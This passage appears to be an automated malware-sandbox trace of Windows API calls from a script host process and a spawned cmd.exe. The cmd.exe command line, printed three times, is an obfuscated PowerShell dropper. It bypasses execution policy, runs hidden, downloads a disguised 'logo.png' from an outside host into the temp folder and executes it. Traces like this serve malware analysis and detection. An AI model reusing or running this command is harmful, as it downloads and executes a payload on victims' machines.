	[0092.010] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0xce
	[0092.011] FreeResource (hResData=0x121c74) returned 0
	[0092.011] bsearch (_Key=0x2fd1b8, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a5a8
	[0092.011] ??2@YAPEAX_K@Z () returned 0x310a40
	[0092.012] MulDiv (nNumber=363, nNumerator=100, nDenominator=1688) returned 22
	[0092.012] CObjectContext::Release () returned 0x1
	[0092.012] GetTickCount () returned 0x27944
	[0092.014] MulDiv (nNumber=446, nNumerator=100, nDenominator=1837) returned 24
	[0092.014] CObjectContext::Release () returned 0x1
	[0092.014] GetTickCount () returned 0x27944
	[0092.421] MulDiv (nNumber=560, nNumerator=100, nDenominator=1904) returned 29
	[0092.421] CObjectContext::Release () returned 0x1
	[0092.421] GetTickCount () returned 0x27ae9
	[0092.422] MulDiv (nNumber=256, nNumerator=100, nDenominator=1856) returned 14
	[0092.422] CObjectContext::Release () returned 0x1
	[0092.422] GetTickCount () returned 0x27ae9
	[0092.424] MulDiv (nNumber=1282, nNumerator=100, nDenominator=2880) returned 45
	[0092.424] CObjectContext::Release () returned 0x1
	[0092.424] GetTickCount () returned 0x27ae9
	[0092.426] MulDiv (nNumber=929, nNumerator=100, nDenominator=2679) returned 35
	[0092.426] CObjectContext::Release () returned 0x1
	[0092.426] GetTickCount () returned 0x27ae9
	[0092.428] MulDiv (nNumber=939, nNumerator=100, nDenominator=2821) returned 33
	[0092.428] CObjectContext::Release () returned 0x1
	[0092.428] GetTickCount () returned 0x27ae9
	[0092.430] MulDiv (nNumber=953, nNumerator=100, nDenominator=2951) returned 32
	[0092.430] CObjectContext::Release () returned 0x1
	[0092.430] GetTickCount () returned 0x27ae9
	[0092.431] MulDiv (nNumber=1053, nNumerator=100, nDenominator=3278) returned 32
	[0092.431] CObjectContext::Release () returned 0x1
	[0092.431] GetTickCount () returned 0x27ae9
	[0092.435] MulDiv (nNumber=1103, nNumerator=100, nDenominator=3418) returned 32
	[0092.435] CObjectContext::Release () returned 0x1
	[0092.435] GetTickCount () returned 0x27ae9
	[0092.439] MulDiv (nNumber=1032, nNumerator=100, nDenominator=3419) returned 30
	[0092.439] CObjectContext::Release () returned 0x1
	[0092.439] GetTickCount () returned 0x27af9
	[0092.443] MulDiv (nNumber=986, nNumerator=100, nDenominator=3451) returned 29
	[0092.443] CObjectContext::Release () returned 0x1
	[0092.443] GetTickCount () returned 0x27af9
	[0092.447] MulDiv (nNumber=1031, nNumerator=100, nDenominator=3503) returned 29
	[0092.447] CObjectContext::Release () returned 0x1
	[0092.447] GetTickCount () returned 0x27af9
	[0092.450] MulDiv (nNumber=1023, nNumerator=100, nDenominator=3505) returned 29
	[0092.450] CObjectContext::Release () returned 0x1
	[0092.450] GetTickCount () returned 0x27af9
	[0092.454] MulDiv (nNumber=997, nNumerator=100, nDenominator=3499) returned 28
	[0092.454] CObjectContext::Release () returned 0x1
	[0092.454] GetTickCount () returned 0x27b08
	[0092.458] MulDiv (nNumber=972, nNumerator=100, nDenominator=3563) returned 27
	[0092.458] CObjectContext::Release () returned 0x1
	[0092.458] GetTickCount () returned 0x27b08
	[0092.461] MulDiv (nNumber=960, nNumerator=100, nDenominator=3619) returned 27
	[0092.461] CObjectContext::Release () returned 0x1
	[0092.461] GetTickCount () returned 0x27b08
	[0092.465] MulDiv (nNumber=1007, nNumerator=100, nDenominator=3706) returned 27
	[0092.465] CObjectContext::Release () returned 0x1
	[0092.465] GetTickCount () returned 0x27b08
	[0092.768] MulDiv (nNumber=1060, nNumerator=100, nDenominator=3765) returned 28
	[0092.768] CObjectContext::Release () returned 0x1
	[0092.768] GetTickCount () returned 0x27c40
	[0092.773] MulDiv (nNumber=1024, nNumerator=100, nDenominator=3595) returned 28
	[0092.773] CObjectContext::Release () returned 0x1
	[0092.773] GetTickCount () returned 0x27c40
	[0092.778] MulDiv (nNumber=1057, nNumerator=100, nDenominator=3645) returned 29
	[0092.778] CObjectContext::Release () returned 0x1
	[0092.778] GetTickCount () returned 0x27c40
	[0092.787] MulDiv (nNumber=981, nNumerator=100, nDenominator=3625) returned 27
	[0092.787] CObjectContext::Release () returned 0x1
	[0092.787] GetTickCount () returned 0x27c50
	[0092.800] MulDiv (nNumber=944, nNumerator=100, nDenominator=3711) returned 25
	[0092.801] CObjectContext::Release () returned 0x1
	[0092.801] GetTickCount () returned 0x27c5f
	[0092.804] _resetstkoflw () returned 0x1
	[0092.804] FindResourceA (hModule=0x7fee13d0000, lpName=0x2, lpType=0x6) returned 0x120718
	[0092.805] LoadResource (hModule=0x7fee13d0000, hResInfo=0x120718) returned 0x120b6c
	[0092.805] LockResource (hResData=0x120b6c) returned 0x120b6c
	[0092.805] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x120718) returned 0x86
	[0092.805] FreeResource (hResData=0x120b6c) returned 0
	[0092.805] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x1207e8
	[0092.805] LoadResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0x121c74
	[0092.805] LockResource (hResData=0x121c74) returned 0x121c74
	[0092.805] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0xce
	[0092.806] FreeResource (hResData=0x121c74) returned 0
	[0092.806] bsearch (_Key=0x213378, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a410
	[0092.806] ??2@YAPEAX_K@Z () returned 0x31dab0
	[0093.034] CreateErrorInfo (in: pperrinfo=0x2fc050 | out: pperrinfo=0x2fc050*=0x46a718) returned 0x0
	[0093.036] CErrorObject::SetGUID () returned 0x0
	[0093.036] CErrorObject::SetSource () returned 0x0
	[0093.036] LoadStringW (in: hInstance=0x7fedf4e0000, uID=0x1004, lpBuffer=0x2fa790, cchBufferMax=2048 | out: lpBuffer="The shortcut pathname must end with .lnk or .url.") returned 0x31
	[0093.036] FormatMessageW (in: dwFlags=0x500, lpSource=0x46e558, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x2fc060, nSize=0x0, Arguments=0x2fc0d0 | out: lpBuffer="ᐐL") returned 0x31
	[0093.036] CErrorObject::SetDescription () returned 0x0
	[0093.036] CErrorObject::SetHelpFile () returned 0x0
	[0093.036] CErrorObject::SetHelpContext () returned 0x0
	[0093.036] QueryInterface () returned 0x0
	[0093.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x46a710) returned 0x0
	[0093.036] Release () returned 0x2
	[0093.036] IUnknown:Release (This=0x46a710) returned 0x1
	[0093.036] LocalFree (hMem=0x4c1410) returned 0x0
	[0093.037] IUnknown:Release (This=0x4c0180) returned 0x1
	[0093.037] GetTickCount () returned 0x27d49
	[0093.037] bsearch (_Key=0x2fd1b8, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a3e0
	[0093.037] ??2@YAPEAX_K@Z () returned 0x33b5e0
	[0093.039] SetItemAlloc () returned 0x0
	[0093.039] Release () returned 0x1
	[0093.039] QueryInterface () returned 0x80004002
	[0093.039] QueryInterface () returned 0x80004002
	[0093.039] QueryInterface () returned 0x80004002
	[0093.039] QueryInterface () returned 0x80004002
	[0093.039] QueryInterface () returned 0x0
	[0093.039] Release () returned 0x1
	[0093.039] realloc (_Block=0x310990, _Size=0x140) returned 0x315540
	[0093.040] MulDiv (nNumber=959, nNumerator=100, nDenominator=3512) returned 27
	[0093.040] CObjectContext::Release () returned 0x1
	[0093.040] GetTickCount () returned 0x27d49
	[0093.043] MulDiv (nNumber=942, nNumerator=100, nDenominator=3617) returned 26
	[0093.043] CObjectContext::Release () returned 0x1
	[0093.043] GetTickCount () returned 0x27d49
	[0093.044] FindResourceA (hModule=0x7fee13d0000, lpName=0x2, lpType=0x6) returned 0x120718
	[0093.045] LoadResource (hModule=0x7fee13d0000, hResInfo=0x120718) returned 0x120b6c
	[0093.045] LockResource (hResData=0x120b6c) returned 0x120b6c
	[0093.045] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x120718) returned 0x86
	[0093.045] FreeResource (hResData=0x120b6c) returned 0
	[0093.045] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x1207e8
	[0093.045] LoadResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0x121c74
	[0093.045] LockResource (hResData=0x121c74) returned 0x121c74
	[0093.045] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0xce
	[0093.046] FreeResource (hResData=0x121c74) returned 0
	[0093.046] bsearch (_Key=0x213378, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a410
	[0094.156] PostMessageA (hWnd=0x2023e, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
	[0094.158] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x2ff9f0*=0xd4, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0094.158] CloseHandle (hObject=0xd4) returned 1
	[0094.158] ??3@YAXPEAX@Z () returned 0x31921001
	[0094.158] IUnknown:Release (This=0x44e5f0) returned 0x0
	[0094.158] ??3@YAXPEAX@Z () returned 0x31921001
	[0094.158] IUnknown:Release (This=0x44e6a0) returned 0x0
	[0094.158] ??3@YAXPEAX@Z () returned 0x31921001
	[0094.158] IUnknown:Release (This=0x44e750) returned 0x0
	[0094.158] ??3@YAXPEAX@Z () returned 0x31921001
	[0094.158] IUnknown:Release (This=0x44e540) returned 0x0
	[0094.159] ??3@YAXPEAX@Z () returned 0x31921001
	[0094.159] ??3@YAXPEAX@Z () returned 0x31921001
	[0094.159] ??3@YAXPEAX@Z () returned 0x31921001
	[0094.159] ??3@YAXPEAX@Z () returned 0x31921001
	[0094.159] GetProcessHeap () returned 0x420000
	[0094.159] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x48aef0 | out: hHeap=0x420000) returned 1
	[0094.160] ??3@YAXPEAX@Z () returned 0x31921001
	[0094.160] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x2ffa20 | out: lplpMessageFilter=0x2ffa20*=0x195f80) returned 0x0
	[0094.160] ??3@YAXPEAX@Z () returned 0x31921001
	[0094.160] ??3@YAXPEAX@Z () returned 0x31921001
	[0094.160] ??3@YAXPEAX@Z () returned 0x31921001
	[0094.160] CoUninitialize () 
	[0094.160] DllCanUnloadNow () returned 0x0
	[0094.160] DllCanUnloadNow () 

Thread:
	id = 216
	os_tid = 0x210


Thread:
	id = 217
	os_tid = 0x4d8

	[0089.983] GetClassInfoA (in: hInstance=0xff6b0000, lpClassName="WSH-Timer", lpWndClass=0x27ffc60 | out: lpWndClass=0x27ffc60) returned 0
	[0089.983] RegisterClassA (lpWndClass=0x27ffc60) returned 0x9006ac138
	[0089.983] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xff6b0000, lpParam=0x195a60) returned 0x2023e
	[0089.984] GetWindowLongPtrA (hWnd=0x2023e, nIndex=-21) returned 0x0
	[0089.984] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x24, wParam=0x0, lParam=0x27ff650) returned 0x0
	[0089.984] GetWindowLongPtrA (hWnd=0x2023e, nIndex=-21) returned 0x0
	[0089.984] SetWindowLongPtrA (hWnd=0x2023e, nIndex=-21, dwNewLong=0x195a60) returned 0x0
	[0089.984] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x81, wParam=0x0, lParam=0x27ff610) returned 0x1
	[0089.985] GetWindowLongPtrA (hWnd=0x2023e, nIndex=-21) returned 0x195a60
	[0089.985] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x83, wParam=0x0, lParam=0x27ff670) returned 0x0
	[0089.987] GetWindowLongPtrA (hWnd=0x2023e, nIndex=-21) returned 0x195a60
	[0089.988] NtdllDefWindowProc_A (hWnd=0x2023e, Msg=0x1, wParam=0x0, lParam=0x27ff610) returned 0x0
	[0089.988] SetEvent (hEvent=0xcc) returned 1
	[0090.064] GetMessageA (in: lpMsg=0x27ffc30, hWnd=0x2023e, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x27ffc30) returned 0
	[0094.155] GetWindowLongPtrA (hWnd=0x2023e, nIndex=-21) returned 0x195a60
	[0094.156] GetWindowLongPtrA (hWnd=0x2023e, nIndex=-21) returned 0x195a60

Thread:
	id = 218
	os_tid = 0x248


Thread:
	id = 219
	os_tid = 0x8cc


Thread:
	id = 220
	os_tid = 0x4b4


Thread:
	id = 223
	os_tid = 0xb6c


Thread:
	id = 224
	os_tid = 0xc0


Thread:
	id = 228
	os_tid = 0x4f4


Thread:
	id = 231
	os_tid = 0x89c


Process:
	id = "26"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x51880000"
	os_pid = "0x4fc"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "24"
	os_parent_pid = "0xb14"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 222
	os_tid = 0xb5c

	[0092.502] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fbf0 | out: lpSystemTimeAsFileTime=0x26fbf0*(dwLowDateTime=0xaf7b60b0, dwHighDateTime=0x1d543d1)) 
	[0092.502] GetCurrentProcessId () returned 0x4fc
	[0092.502] GetCurrentThreadId () returned 0xb5c
	[0092.502] GetTickCount () returned 0x27b37
	[0092.502] QueryPerformanceCounter (in: lpPerformanceCount=0x26fbf8 | out: lpPerformanceCount=0x26fbf8*=21692816071) returned 1
	[0092.503] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000
	[0092.503] __set_app_type (_Type=0x1) 
	[0092.503] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0
	[0092.503] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0
	[0092.504] GetCurrentThreadId () returned 0xb5c
	[0092.504] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb5c) returned 0x3c
	[0092.504] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0092.504] GetProcAddress (hModule=0x77040000, lpProcName="SetThreadUILanguage") returned 0x77056d40
	[0092.504] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0092.504] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0092.504] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fb88 | out: phkResult=0x26fb88*=0x0) returned 0x2
	[0092.504] VirtualQuery (in: lpAddress=0x26fb70, lpBuffer=0x26faf0, dwLength=0x30 | out: lpBuffer=0x26faf0*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.504] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26faf0, dwLength=0x30 | out: lpBuffer=0x26faf0*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.504] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26faf0, dwLength=0x30 | out: lpBuffer=0x26faf0*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.504] VirtualQuery (in: lpAddress=0x174000, lpBuffer=0x26faf0, dwLength=0x30 | out: lpBuffer=0x26faf0*(BaseAddress=0x174000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.505] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26faf0, dwLength=0x30 | out: lpBuffer=0x26faf0*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0092.505] GetConsoleOutputCP () returned 0x1b5
	[0092.505] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0092.505] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1
	[0092.505] _get_osfhandle (_FileHandle=1) returned 0x7
	[0092.505] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0092.506] _get_osfhandle (_FileHandle=1) returned 0x7
	[0092.506] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1
	[0092.506] _get_osfhandle (_FileHandle=1) returned 0x7
	[0092.506] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0092.506] _get_osfhandle (_FileHandle=0) returned 0x3
	[0092.506] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1
	[0092.506] _get_osfhandle (_FileHandle=0) returned 0x3
	[0092.506] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0092.506] GetEnvironmentStringsW () returned 0x3f8f20*
	[0092.507] GetProcessHeap () returned 0x3e0000
	[0092.507] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xad4) returned 0x3f9a00
	[0092.507] FreeEnvironmentStringsW (penv=0x3f8f20) returned 1
	[0092.507] GetProcessHeap () returned 0x3e0000
	[0092.507] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x8) returned 0x3f87a0
	[0092.507] GetEnvironmentStringsW () returned 0x3f8f20*
	[0092.507] GetProcessHeap () returned 0x3e0000
	[0092.507] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xad4) returned 0x3fa4e0
	[0092.507] FreeEnvironmentStringsW (penv=0x3f8f20) returned 1
	[0092.507] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ea48 | out: phkResult=0x26ea48*=0x44) returned 0x0
	[0092.507] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ea40, lpData=0x26ea60, lpcbData=0x26ea44*=0x1000 | out: lpType=0x26ea40*=0x0, lpData=0x26ea60*=0x18, lpcbData=0x26ea44*=0x1000) returned 0x2
	[0092.507] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ea40, lpData=0x26ea60, lpcbData=0x26ea44*=0x1000 | out: lpType=0x26ea40*=0x4, lpData=0x26ea60*=0x1, lpcbData=0x26ea44*=0x4) returned 0x0
	[0092.507] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ea40, lpData=0x26ea60, lpcbData=0x26ea44*=0x1000 | out: lpType=0x26ea40*=0x0, lpData=0x26ea60*=0x1, lpcbData=0x26ea44*=0x1000) returned 0x2
	[0092.507] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ea40, lpData=0x26ea60, lpcbData=0x26ea44*=0x1000 | out: lpType=0x26ea40*=0x4, lpData=0x26ea60*=0x0, lpcbData=0x26ea44*=0x4) returned 0x0
	[0092.507] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ea40, lpData=0x26ea60, lpcbData=0x26ea44*=0x1000 | out: lpType=0x26ea40*=0x4, lpData=0x26ea60*=0x40, lpcbData=0x26ea44*=0x4) returned 0x0
	[0092.507] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ea40, lpData=0x26ea60, lpcbData=0x26ea44*=0x1000 | out: lpType=0x26ea40*=0x4, lpData=0x26ea60*=0x40, lpcbData=0x26ea44*=0x4) returned 0x0
	[0092.507] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ea40, lpData=0x26ea60, lpcbData=0x26ea44*=0x1000 | out: lpType=0x26ea40*=0x0, lpData=0x26ea60*=0x40, lpcbData=0x26ea44*=0x1000) returned 0x2
	[0092.507] RegCloseKey (hKey=0x44) returned 0x0
	[0092.507] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ea48 | out: phkResult=0x26ea48*=0x44) returned 0x0
	[0092.508] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ea40, lpData=0x26ea60, lpcbData=0x26ea44*=0x1000 | out: lpType=0x26ea40*=0x0, lpData=0x26ea60*=0x40, lpcbData=0x26ea44*=0x1000) returned 0x2
	[0092.508] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ea40, lpData=0x26ea60, lpcbData=0x26ea44*=0x1000 | out: lpType=0x26ea40*=0x4, lpData=0x26ea60*=0x1, lpcbData=0x26ea44*=0x4) returned 0x0
	[0092.508] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ea40, lpData=0x26ea60, lpcbData=0x26ea44*=0x1000 | out: lpType=0x26ea40*=0x0, lpData=0x26ea60*=0x1, lpcbData=0x26ea44*=0x1000) returned 0x2
	[0092.508] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ea40, lpData=0x26ea60, lpcbData=0x26ea44*=0x1000 | out: lpType=0x26ea40*=0x4, lpData=0x26ea60*=0x0, lpcbData=0x26ea44*=0x4) returned 0x0
	[0092.508] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ea40, lpData=0x26ea60, lpcbData=0x26ea44*=0x1000 | out: lpType=0x26ea40*=0x4, lpData=0x26ea60*=0x9, lpcbData=0x26ea44*=0x4) returned 0x0
	[0092.508] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ea40, lpData=0x26ea60, lpcbData=0x26ea44*=0x1000 | out: lpType=0x26ea40*=0x4, lpData=0x26ea60*=0x9, lpcbData=0x26ea44*=0x4) returned 0x0
	[0092.508] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ea40, lpData=0x26ea60, lpcbData=0x26ea44*=0x1000 | out: lpType=0x26ea40*=0x0, lpData=0x26ea60*=0x9, lpcbData=0x26ea44*=0x1000) returned 0x2
	[0092.508] RegCloseKey (hKey=0x44) returned 0x0
	[0092.508] time (in: timer=0x0 | out: timer=0x0) returned 0x5d3b2e6a
	[0092.508] srand (_Seed=0x5d3b2e6a) 
	[0092.508] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0092.508] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0092.508] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0092.508] GetProcessHeap () returned 0x3e0000
	[0092.508] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x218) returned 0x3f8f20
	[0092.508] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3f8f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0092.509] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0092.509] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0092.509] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0092.509] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0092.509] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0092.509] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0092.509] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0092.509] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0092.509] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0092.509] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0092.509] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0092.509] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0092.509] GetProcessHeap () returned 0x3e0000
	[0092.509] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9a00 | out: hHeap=0x3e0000) returned 1
	[0092.509] GetEnvironmentStringsW () returned 0x3f9140*
	[0092.509] GetProcessHeap () returned 0x3e0000
	[0092.509] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xaec) returned 0x3fbad0
	[0092.509] FreeEnvironmentStringsW (penv=0x3f9140) returned 1
	[0092.509] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0092.509] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0092.509] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0092.509] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0092.509] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0092.509] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0092.509] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0092.509] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0092.509] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0092.509] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0092.510] GetProcessHeap () returned 0x3e0000
	[0092.510] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x48) returned 0x3f8d80
	[0092.510] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f850 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
